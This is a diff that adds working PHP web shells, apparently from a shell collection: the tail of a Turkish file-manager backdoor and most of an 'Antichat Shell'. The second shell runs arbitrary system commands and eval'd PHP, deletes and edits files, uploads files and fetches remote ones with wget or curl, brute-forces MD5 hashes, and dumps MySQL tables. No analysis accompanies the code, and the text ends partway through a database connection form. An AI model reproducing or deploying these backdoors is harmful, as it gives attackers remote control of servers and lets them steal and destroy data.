+if(is_file("$path/$file")){
+$disk_space=filesize("$path/$file");
+$kb=$disk_space/1024;
+$total_kb = number_format($kb, 2, '.', '');
+$total_kb2="Kb";
+
+
+echo "<div align=right><font face='arial' size='2' color='#C0C0C0'><b> $file</b></font> - <a href='./$this_file?save=$path/$file&fname=$file'>indir</a> - <a href='./$this_file?op=edit&fname=$path/$file&dir=$path'>düzenle</a> - ";
+echo "<a href='./$this_file?op=del&fname=$path/$file&dir=$path'>sil</a> - <b>$total_kb$total_kb2</b> - ";
+@$fileperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><font color='#FFFF00'>$fileperm</font></a>";
+echo "<br></div>\n";
+}else{
+echo "<div align=left><a href='./$this_file?dir=$path/$file'>GÝT></a> <font face='arial' size='3' color='#808080'> $path/$file</font> - <b>DIR</b> - <a href='./$this_file?op=dd&yol=$path/$file&here=$path'>Sil</a> - ";
+$dirperm=substr(base_convert(fileperms("$path/$file"),10,8),-4);
+echo "<font color='#FFFF00'>$dirperm</font>";
+echo " <br></div>\n";
+
+}
+}
+}
+closedir($dir);
+}
+}
+
+
+
+
+
+echo "<center><a href='./$this_file?dir=$DOCUMENT_ROOT'>Root Klasörüne Git</a></center>";
+if(file_exists("B:\\")){
+echo "<center><a href='./$this_file?dir=B:\\'>B:\\</a></center>";
+} else {}
+if(file_exists("C:\\")){
+echo "<center><a href='./$this_file?dir=C:\\'>C:\\</a></center>";
+} else {}
+if (file_exists("D:\\")){
+ echo "<center><a href='./$this_file?dir=D:\\'>D:\\</a></center>";
+} else {}
+if (file_exists("E:\\")){
+ echo "<center><a href='./$this_file?dir=E:\\'>E:\\</a></center>";
+} else {}
+if (file_exists("F:\\")){
+ echo "<center><a href='./$this_file?dir=F:\\'>F:\\</a></center>";
+} else {}
+if (file_exists("G:\\")){
+ echo "<center><a href='./$this_file?dir=G:\\'>G:\\</a></center>";
+} else {}
+if (file_exists("H:\\")){
+ echo "<center><a href='./$this_file?dir=H:\\'>H:\\</a></center>";
+} else {}
+
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>SERVER BÝLGÝLERÝ</b></font><br></center>";
+echo "<br><u><b>$SERVER_SIGNATURE</b></u>";
+echo "<b><u>Software</u>: $SERVER_SOFTWARE</b><br>";
+echo "<b><u>Server IP</u>: $SERVER_ADDR</b><br>";
+echo "<br>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center><font size='+1' color='#FF0000'><b>ÝÞLEMLER</b></font><br></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=up&dir=$path'>Dosya Gönder</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=mf&dir=$path'>Dosya Oluþtur</a></font></center>";
+echo "<br><center><font size='4'><a href='$this_file?op=md&dir=$path'>Klasör Oluþtur</a></font></center>";
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<center>Tüm haklarý sahibi 	C-W-M'ye aittir</center><br>";
+?>
+
+
+
+
diff --git a/xakep-shells/PHP/a_gedit.php.php.txt b/xakep-shells/PHP/a_gedit.php.php.txt
new file mode 100644
index 0000000..41822d7
--- /dev/null
+++ b/xakep-shells/PHP/a_gedit.php.php.txt
@@ -0,0 +1,693 @@
+<?php
+session_start();
+error_reporting(E_ALL ^ E_NOTICE);
+$self=$HTTP_SERVER_VARS['PHP_SELF'];
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
+@ini_set('max_execution_time',0);
+(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF");
+(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
+(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
+$action=$_POST['action'];
+$file=$_POST['file'];
+$dir=$_POST['dir'];
+$content='';
+$stdata='';
+$style='<STYLE>BODY{background-color: #2b2f34;color: #9acd32;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #31333b;scrollbar-shadow-color: #363940;scrollbar-highlight-color: #363940;scrollbar-3dlight-color: #363940;scrollbar-darkshadow-color: #363940;scrollbar-track-color: #363940;scrollbar-arrow-color: #363940;}input{background-color: #31333b;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #31333b;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #363940;font-size: 8pt;color: #b50016;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #91cd32;text-decoration: none;font-size: 8pt;}a:visited{color: #91cd32;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+$lang=array(
+'filext'=>'File already exists.',
+'uploadok'=>'File was successfully uploaded.',
+'dircrt'=>'Dir is created.',
+'dontlist'=>'Listing dir permission denide.',
+'dircrterr'=>'Don\'t create dir.',
+'dirnf'=>'Dir not found.',
+'filenf'=>'File not found.',
+'dontwrdir'=>'Only read current dir.',
+'empty'=>'Directory not empty or access denide.',
+'deletefileok'=>'File deleted.',
+'deletedirok'=>'Dir deleted.',
+'isdontfile'=>'Selected file this is link.',
+'cantrfile'=>'Cant read file, permission denide.',
+'onlyracc'=>'Don\'t edit, only read access.',
+'workdir'=>'Work directory: ',
+'fullacc'=>'Full access.',
+'fullaccdir'=>'Full accees you are can create and delete dir.',
+'thisnodir'=>'This is don\'t dir.',
+'allfuncsh'=>'All function for work shell was disabled.'
+);
+
+$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir','brute','mysql');//here added new actions
+
+function test_file($file){
+if(!file_exists($file))$err="1";
+elseif(!is_file($file)) $err="2";
+elseif(!is_readable($file))$err="3";
+elseif(!is_writable($file))$err="4"; else $err="5";
+return $err;}
+
+function test_dir($dir){
+if(!file_exists($dir))$err="1";
+elseif(!is_dir($dir)) $err="2";
+elseif(!is_readable($dir))$err="3";
+elseif(!is_writable($dir))$err="4"; else $err="5";
+return $err;}
+
+function perms($file){ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;} 
+
+function view_size($size){
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;}
+
+if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
+
+if(isset($dir)){
+  $ts['test']=test_dir($dir); 
+  switch($ts['test']){
+    case 1:$stdata.=$lang['dirnf'];break;
+    case 2:$stdata.=$lang['thisnodir'];break;
+    case 3:$stdata.=$lang['dontlist'];break;
+    case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
+    case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
+}else $dir=@chdir($dir);
+
+$dir=getcwd()."/";
+$dir=str_replace("\\","/",$dir);
+
+if(isset($file)){
+    $ts['test1']=test_file($file);
+  switch ($ts['test1']){
+    case 1:$stdata.=$lang['filenf'];break;
+	case 2:$stdata.=$lang['isdontfile'];break;
+	case 3:$stdata.=$lang['cantrfile'];break;
+	case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
+	case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
+}
+
+function shell($cmd)
+{
+  global $lang;
+ $ret = '';
+ if (!empty($cmd))
+ {
+  if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
+  elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
+  elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
+  else $ret=$lang['allfuncsh'];
+ }
+ return $ret;
+}
+
+function createdir($dir){mkdir($dir);}
+
+//delete file
+if($action=="delete"){ 
+if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> Click here for back in viewer</a>";
+}
+//delete dir
+if($action=="deletedir"){ 
+if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> Click here for back in viewer</a>";
+else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> Click here for back in viewer</a>";
+}
+//shell
+if($action=="shell"){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
+<input type=\"submit\" value=\"execute\"></form>";}
+//editor  
+if($action=="editor"){
+  $stdata.="<tr><td><form method=POST>
+  <input type=\"hidden\" name=\"action\" value=\"editor\">
+  <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+  Open file:<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\">>\"></form>";	  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+}
+  function readf($file){
+  clearstatcache();
+  $f=fopen($file, "r");
+  $contents = fread($f,filesize($file));
+  fclose($f);
+  return htmlspecialchars($contents);
+}
+if(@$_POST['save'])writef($file,$_POST['data']);
+if(@$_POST['create'])writef($file,"");
+$test=test_file($file);
+if($test==1){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
+<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
+<input type=\"reset\" value=\"No\"></form>";
+}
+if($test>2){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
+}}
+//viewer
+if($action=="viewer"){
+$content.="<table cellSpacing=0 border=2 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+$content.="<tr><td><form method=POST><br>Open directory:  <input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\">>\"></form>";
+  if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		if ($GLOBALS['os']==1) {
+		  $content.="<tr><td>Select drive:";
+		  for ($j=ord('C'); $j<=ord('Z'); $j++) 
+		   if (@$dh = opendir(chr($j).":/"))
+		   $content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+		   $content.="</td></tr>";
+		 }
+		$content.="<tr><td>Name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
+		for($i=0;$i<count($dire);$i++) {
+		  $link=$dir.$dire[$i];
+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>';  
+		}
+		for($i=0;$i<count($files);$i++) {
+		  $linkfile=$dir.$files[$i];
+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>'; 
+		}
+		$content.="</table>";
+}}}
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);}
+//phpeval
+if($action=="phpeval"){
+$content.="<form method=\"POST\">
+ <input type=\"hidden\" name=\"action\" value=\"phpeval\">
+ <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+ &lt;?php<br>
+ <textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
+ ?><br>
+ <input type=\"submit\" value=\"execute\"></form>";
+if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
+//upload
+if($action=="upload"){
+  if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
+  $form_win="<table><form method=POST enctype=multipart/form-data>
+  <tr><td><input type=\"hidden\" name=\"action\" value=\"upload\">  
+  Upload to dir: <input type=text name=dirupload value=\"".$dirupload."\" size=50><tr><td>New file name: <input type=text name=filename></td></tr><tr><td><input type=file name=file> <input type=submit name=uploadloc value='Upload local file'></td></tr>";
+  if($os==1)$content.=$form_win;
+  if($os==0){
+    $content.=$form_win;
+	$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
+<input type=submit name=upload value=Upload></form></td></tr>';	
+}
+
+if(isset($_POST['uploadloc'])){
+if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
+$uploadfile = $dirupload."/".$_POST['filename'];
+
+if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
+if(file_exists($uploadfile))$content.=$lang['filext']; 
+elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
+$content.=$lang['uploadok'];
+}
+
+if(isset($_POST['upload'])){
+    if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
+	switch($_POST['with'])
+	{
+	  case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
+ 	  case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
+ 	  case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
+}}}
+//Brute
+if($action=="brute"){
+
+function Brute() {
+ global $action,$pass_de,$chars_de,$dat,$date;
+ignore_user_abort(1);
+}
+if($chars_de==""){$chars_de="";}
+$content="<table><form action='$php_self' method=post name=md5><tr><td><b>Decrypte MD5</b>
+<tr><td>&nbsp;MD5 õåø:<b>".$pass_de."</b></td>
+<input type='hidden' name='action' value='$action'>
+<tr><td>&nbsp;<textarea  class='inputbox' name='chars_de' cols='50' rows='5'>".$chars_de."</textarea></td>
+<td><b>Ïåðåáîð áóêâ:</b><br><font color=red><b><u>ENG:</u></b></font>
+<a class=menu href=javascript:ins('abcdefghijklmnopqrstuvwxyz')>[a-z]</a>
+<a class=menu href=javascript:ins('ABCDEFGHIJKLMNOPQRSTUVWXYZ')>[A-Z]</a><br>
+<a class=menu href=javascript:ins('0123456789')>[0-9]</a>
+<a class=menu href=javascript:ins('~`\!@#$%^&*()-_+=|/?&gt;<[]{}:¹.,&quot;')>[Ñèìâîëû]</a><br><br>
+<font color=red><b><u>RUS:</u></b></font>
+<a class=menu href=javascript:ins('àáâãäå¸æçèéêëìíîïðñòóôõö÷øùúûüýþÿ')>[à-ÿ]</a>
+<a class=menu href=javascript:ins('ÀÁÂÃÄŨÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞß')>[À-ß]</a>
+<br></br><input type=reset value=Î÷èñòèòü class=button1></td></tr>
+<tr><td>&nbsp;<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''>
+</td><td><input type='submit' value='Decrypt MD5' class=button1></td></tr></form>
+<script>
+function ins(text){
+document.md5.chars_de.value+=text;
+document.md5.chars_de.focus();}
+</script>";
+
+if($_POST[pass_de]){  
+$pass_de=htmlspecialchars($pass_de);
+$pass_de=stripslashes($pass_de);
+$dat=date("H:i:s");
+$date=date("d:m:Y");
+}
+{
+crack_md5();
+}
+}
+function crack_md5() {
+global $chars_de;
+$chars=$_POST[chars];
+set_time_limit(0);
+ignore_user_abort(1);
+$chars_de=str_replace("<",chr(60),$chars_de);
+$chars_de=str_replace(">",chr(62),$chars_de);
+$c=strlen($chars_de);
+for ($next = 0; $next <= 31; $next++) {
+for ($i1 = 0; $i1 <= $c; $i1++) {
+$word[1] = $chars_de{$i1};
+for ($i2 = 0; $i2 <= $c; $i2++) {
+$word[2] = $chars_de{$i2};
+if ($next <= 2) {
+result(implode($word));
+}else {
+for ($i3 = 0; $i3 <= $c; $i3++) {
+$word[3] = $chars_de{$i3};
+if ($next <= 3) {
+result(implode($word));
+}else {
+for ($i4 = 0; $i4 <= $c; $i4++) {
+$word[4] = $chars_de{$i4};
+if ($next <= 4) {
+result(implode($word));
+}else {
+for ($i5 = 0; $i5 <= $c; $i5++) {
+$word[5] = $chars_de{$i5};
+if ($next <= 5) {
+result(implode($word));
+}else {
+for ($i6 = 0; $i6 <= $c; $i6++) {
+$word[6] = $chars_de{$i6};
+if ($next <= 6) {
+result(implode($word));
+}else {
+for ($i7 = 0; $i7 <= $c; $i7++) {
+$word[7] = $chars_de{$i7};
+if ($next <= 7) {
+result(implode($word));
+}else {
+for ($i8 = 0; $i8 <= $c; $i8++) {
+$word[8] = $chars_de{$i8};
+if ($next <= 8) {
+result(implode($word));
+}else {
+for ($i9 = 0; $i9 <= $c; $i9++) {
+$word[9] = $chars_de{$i9};
+if ($next <= 9) {
+result(implode($word));
+}else {
+for ($i10 = 0; $i10 <= $c; $i10++) {
+$word[10] = $chars_de{$i10};
+if ($next <= 10) {
+result(implode($word));
+}else {
+for ($i11 = 0; $i11 <= $c; $i11++) {
+$word[11] = $chars_de{$i11};
+if ($next <= 11) {
+result(implode($word));
+}else {
+for ($i12 = 0; $i12 <= $c; $i12++) {
+$word[12] = $chars_de{$i12};
+if ($next <= 12) {
+result(implode($word));
+}else {
+for ($i13 = 0; $i13 <= $c; $i13++) {
+$word[13] = $chars_de{$i13};
+if ($next <= 13) {
+result(implode($word));
+}else {
+for ($i14 = 0; $i14 <= $c; $i14++) {
+$word[14] = $chars_de{$i14};
+if ($next <= 14) {
+result(implode($word));
+}else {
+for ($i15 = 0; $i15 <= $c; $i15++) {
+$word[15] = $chars_de{$i15};
+if ($next <= 15) {
+result(implode($word));
+}else {
+for ($i16 = 0; $i16 <= $c; $i16++) {
+$word[16] = $chars_de{$i16};
+if ($next <= 16) {
+result(implode($word));
+}else {
+for ($i17 = 0; $i17 <= $c; $i17++) {
+$word[17] = $chars_de{$i17};
+if ($next <= 17) {
+result(implode($word));
+}else {
+for ($i18 = 0; $i18 <= $c; $i18++) {
+$word[18] = $chars_de{$i18};
+if ($next <= 18) {
+result(implode($word));
+}else {
+for ($i19 = 0; $i19 <= $c; $i19++) {
+$word[19] = $chars_de{$i19};
+if ($next <= 19) {
+result(implode($word));
+}else {
+for ($i20 = 0; $i20 <= $c; $i20++) {
+$word[20] = $chars_de{$i20};
+if ($next <= 20) {
+result(implode($word));
+}else {
+for ($i21 = 0; $i21 <= $c; $i21++) {
+$word[21] = $chars_de{$i21};
+if ($next <= 21) {
+result(implode($word));
+}else {
+for ($i22 = 0; $i22 <= $c; $i22++) {
+$word[22] = $chars_de{$i22};
+if ($next <= 22) {
+result(implode($word));
+}else {
+for ($i23 = 0; $i23 <= $c; $i23++) {
+$word[23] = $chars_de{$i23};
+if ($next <= 23) {
+result(implode($word));
+}else {
+for ($i24 = 0; $i24 <= $c; $i24++) {
+$word[24] = $chars_de{$i24};
+if ($next <= 24) {
+result(implode($word));
+}else {
+for ($i25 = 0; $i25 <= $c; $i25++) {
+$word[25] = $chars_de{$i25};
+if ($next <= 25) {
+result(implode($word));
+}else {
+for ($i26 = 0; $i26 <= $c; $i26++) {
+$word[26] = $chars_de{$i26};
+if ($next <= 26) {
+result(implode($word));
+}else {
+for ($i27 = 0; $i27 <= $c; $i27++) {
+$word[27] = $chars_de{$i27};
+if ($next <= 27) {
+result(implode($word));
+}else {
+for ($i28 = 0; $i28 <= $c; $i28++) {
+$word[28] = $chars_de{$i28};
+if ($next <= 28) {
+result(implode($word));
+}else {
+for ($i29 = 0; $i29 <= $c; $i29++) {
+$word[29] = $chars_de{$i29};
+if ($next <= 29) {
+result(implode($word));
+}else {
+for ($i30 = 0; $i30 <= $c; $i30++) {
+$word[30] = $chars_de{$i30};
+if ($next <= 30) {
+result(implode($word));
+}else {
+for ($i31 = 0; $i31 <= $c; $i31++) {
+$word[31] = $chars_de{$i31};
+if ($next <= 31) {
+result(implode($word));
+}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
+
+function result($word) {
+global $dat,$date;
+$pass_de=$_POST[pass_de];
+$dat2=date("H:i:s");
+$date2=date("d:m:Y");
+
+if(md5($word)==$pass_de){ 
+
+
+
+echo "<STYLE>BODY{background-color: #2b2f34;color: #9acd32;</STYLE><table><tr><td>Ðåçóëüòàò âûïîëíåíèÿ ïåðåáîðà ïàðîëåé:</td></tr>
+<tr><td>Çàõåøèðîâàííûé ïàðîëü:</b></td><td><font color=red>&nbsp;&nbsp;$word</font></td></tr>
+<tr><td>Íà÷àëî ïåðåáîðà:</td><td>&nbsp;&nbsp;$dat - $date</td></tr>
+<tr><td>Îêîí÷àíèå ïåðåáîðà:</td><td>&nbsp;&nbsp;$dat2 - $date2</td></tr>
+<tr><td>Âûïîëíåíèå ïåðåáîðà õåøåé çàïèñàí â ôàéë:  ".$word."_md5</td></tr></table>";
+
+
+
+$f=@fopen($word._md5,"a+");
+fputs($f,"Õýø èç MD5 [$pass_de] = $word 
+Íà÷àëî ïåðåáîðà:\t$dat - $date 
+Îêîí÷àíèå ïåðåáîðà:\t$dat2 - $date2");
+exit;
+}}
+
+//Mysql
+
+if($action=="mysql"){
+if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){
+  $db = @mysql_connect('localhost',$_POST['mysql_l'],$_POST['mysql_p']);
+  if($db)
+   {
+   if(@mysql_select_db($_POST['mysql_db'],$db))
+    {
+     $sql1 .= "# ---------------------------------\r\n";
+     $sql1 .= "#     date : ".date ("j F Y g:i")."\r\n";
+     $sql1 .= "# database : ".$_POST['mysql_db']."\r\n";
+     $sql1 .= "#    table : ".$_POST['mysql_tbl']."\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db);
+     $row   = @mysql_fetch_row($res);
+     $sql1 .= $row[1]."\r\n\r\n";
+     $sql1 .= "# ---------------------------------\r\n\r\n";
+
+     $sql2 = '';
+
+     $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db);
+     if (@mysql_num_rows($res) > 0) {
+     while ($row = @mysql_fetch_assoc($res)) {
+     $keys = @implode("`, `", @array_keys($row));
+     $values = @array_values($row);
+     foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+     $values = @implode("', '", $values);
+     $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".$values."');\r\n";
+     }
+     $sql2 .= "\r\n# ---------------------------------";
+     }
+     $content.="<center><b>Ãîòîâî! Äàìï ïðîøåë óäà÷íî!</b></center>";
+    if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
+    else { echo $sql1.$sql2; }
+    } // end if(@mysql_select_db($_POST['mysql_db'],$db))
+    else $content.="<center><b>Òàêîé ÁÄ íåò!</b></center>";
+   @mysql_close($db);
+   } 
+ } // end if(($_POST['dif']&&$fp)||(!$_POST['dif'])){
+ else if(!empty($_POST['dif'])&&!$fp) { $content.="<center><b>ÎØÈÁÊÀ, íåò ïðàâ çàïèñè â ôàéë!</b></center>"; }
+
+$content.="<form name='mysql_dump' action='$php_self' method='post'>
+<input type='hidden' name='action' value='$action'>
+&nbsp;Áàçà: <input type=text name=mysql_db size=15 value=";
+$content.=(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"));
+$content.=">&nbsp;Òàáëèöà: &nbsp;<input type=text name=mysql_tbl size=15 value=";
+$content.=(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"));
+$content.=">&nbsp;Ëîãèí: &nbsp;<input type=text name=mysql_l size=15 value=";
+$content.=(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"));
+$content.=">&nbsp;Ïàðîëü: &nbsp;<input type=text name=mysql_p size=15 value=";
+$content.=(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"));
+$content.="><input type=hidden name=dir size=85 value=".$dir.">
+<input type=hidden name=cmd size=85 value=mysql_dump>
+<br>&nbsp;Ñîõðàíèòü äàìï â ôàéëå: <input type=checkbox name=dif value=1 id=dif><input type=text name=dif_name size=80 value=";
+$content.=(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"));
+$content.="><input type=submit name=submit value=Ñîõðàíèòü></form>"; 
+
+@$php_self=$_POST['PHP_SELF'];
+@$from=$_POST['from'];
+@$to=$_POST['to'];
+@$adress=$_POST['adress'];
+@$port=$_POST['port'];
+@$login=$_POST['login'];
+@$pass=$_POST['pass'];
+@$adress=$_POST['adress'];
+@$port=$_POST['port'];
+@$login=$_POST['login'];
+@$pass=$_POST['pass'];
+if(!isset($adress)){$adress="localhost";}
+if(!isset($login)){$login="root";}
+if(!isset($pass)){$pass="";}
+if(!isset($port)){$port="3306";}
+if(!isset($from)){$from=0;}
+if(!isset($to)){$to=50;}
+
+if(!@$conn){
+$content.="<form name='mysql_dump' action='$php_self' method='post'>
+<table><tr><td valign=top>
+<input type='hidden' name='action' value='$action'>
+<input type=hidden name=ac value=sql>
+<tr><td valign=top>Õîñò: &nbsp;&nbsp;&nbsp;&nbsp;<input name=adress value='$adress' size=20>
+<tr><td valign=top>Ïîðò: &nbsp;&nbsp;&nbsp;&nbsp;<input name=port value='$port' size=20>
+<tr><td valign=top>Ëîãèí: &nbsp;&nbsp;<input name=login value='$login' size=20>
